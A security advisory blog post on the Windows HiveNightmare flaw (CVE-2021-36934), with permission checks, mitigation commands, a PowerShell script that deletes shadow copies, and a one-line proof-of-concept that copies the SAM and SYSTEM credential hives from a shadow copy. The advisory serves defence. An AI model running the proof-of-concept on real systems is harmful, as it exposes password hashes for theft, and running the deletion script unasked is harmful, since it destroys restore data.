CVE-2021-36934 – HiveNightmare

Fortify Security Team
Jul 27, 2021

Summary

The default configuration in Microsoft Windows 10 v1809 and newer includes an elevation of privilege vulnerability, because of overly permissive Access Control Lists (ACLs) in the Security Accounts Manager (SAM) database, as well as multiple other system files. Upon successful exploitation, an attacker can run arbitrary code with SYSTEM privileges, leading to installation of programs; viewing, changing, or deleting data, or the creation of new accounts with full user rights. Attackers must have the ability to execute code on a victim system to exploit this vulnerability.

At this time, mitigation includes restricting access to Windows configuration files, then deleting VSS shadow copies, as detailed below.

Applies To

  • Windows 10 Version 21H1: 32-bit, x64, and ARM641
  • Windows 10 Version 2004: 32-bit
  • Windows 10 Version 1909: 32-bit, x64, and ARM641
  • Windows 10 Version 1809: 32-bit, x64, and ARM641
  • Windows Server Core 2019
  • Windows Server 2019

How do I see if I’m impacted?

You can run the following from cmd.exe to check the permissions on various hives:

Command Prompt: icacls %windir%\system32\config\SAM
PowerShell: icacls $env:windir\System32\config\SAM

If impacted, the expected output would be as follows:

C:\Users\andrew>icacls C:\Windows\System32\config\SAM
C:\Windows\System32\config\SAM BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

A vulnerable system will report an output indicating the hive is read accessible (RX): BUILTIN\Users:(I)(RX)

What are the current mitigation steps?

Restrict access to the contents of %windir%\system32\config

  1. Open Command Prompt or Windows PowerShell as an administrator.
  2. Run this command in either:
    • Command Prompt:
      icacls %windir%\system32\config\*.* /inheritance:e
    • PowerShell:
      icacls $env:windir\system32\config\. /inheritance:e

Delete Volume Shadow Copy Service (VSS) shadow copies

Note: This step is a modified version of the Microsoft MSRC article’s guidance.

In order to implement Microsoft’s workaround with our recommended policy settings, use the following PowerShell .PS1 script. This can be run locally on your systems or remotely via Real Time Response.

Get-WmiObject Win32_Shadowcopy | ForEach-Object {
Write-Host “Deleting VSS ” $_.ID.ToLower()
$cmd = “delete shadows /shadow=” + $_.ID.ToLower() + ” /quiet”
Start-Process -FilePath $env:SystemRoot\system32\vssadmin.exe -ArgumentList $cmd -Wait
}

Once you have deleted the VSS shadow copies and restore points, create a new System Restore point if desired.

Impact of workaround: Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications.

Note: You must restrict access and delete shadow copies to prevent exploitation of this vulnerability.

Proof of Concept

Available here or run this command from a non-admin PowerShell prompt:

foreach($i in @(“SYSTEM”,”SAM”)){[System.IO.File]::Copy(\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\$i, “$i”)};

Recent Posts

MedusaLocker Ransomware Technical Details

Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks. The MedusaLocker actors encrypt the victim’s data and leave a ransom note with communication instructions in every...

CVE-2022-30190 aka Follina

Move over log4j, there is a new 0-day vulnerability being exploited in the wild. The first sample that exploits the vulnerability appeared on VirusTotal on April 12th, 2022. Successful exploitation allows an attacker to run arbitrary code with the privileges of the...

BlackCat/ALPHV Ransomware IOCs

As of March 2022, BlackCat/ALPHV ransomware as a service (RaaS) had compromised at least 60 entities worldwide and is the first ransomware group to do so successfully using RUST, considered to be a more secure programming language that offers improved performance and...

Ragnarlocker Ransomware IOCs

RagnarLocker is identified by the extension “.RGNR_<ID>,” where <ID> is a hash of the computer’s NETBIOS name. The actors, identifying themselves as “RAGNAR_LOCKER,” leave a .txt ransom note, with instructions on how to pay the ransom and decrypt the data....

IOCs Associated with Ranzy Locker Ransomware

The FBI first identified Ranzy Locker ransomware in late 2020 when the variant began to target victims in the United States. Unknown cyber criminals using Ranzy Locker ransomware had compromised more than 30 US businesses as of July 2021. The victims include the...

Conti Ransomware

While Conti is considered a ransomware-as-a-service (RaaS) model ransomware variant, there is variation in its structure that differentiates it from a typical affiliate model. It is likely that Conti developers pay the deployer's of the ransomware a wage rather than a...

BlackMatter Ransomware

This advisory provides information on cyber actor tactics, techniques, and procedures (TTPs) obtained from a sample of BlackMatter ransomware analyzed in a sandbox environment as well from trusted third-party reporting. Using embedded, previously compromised...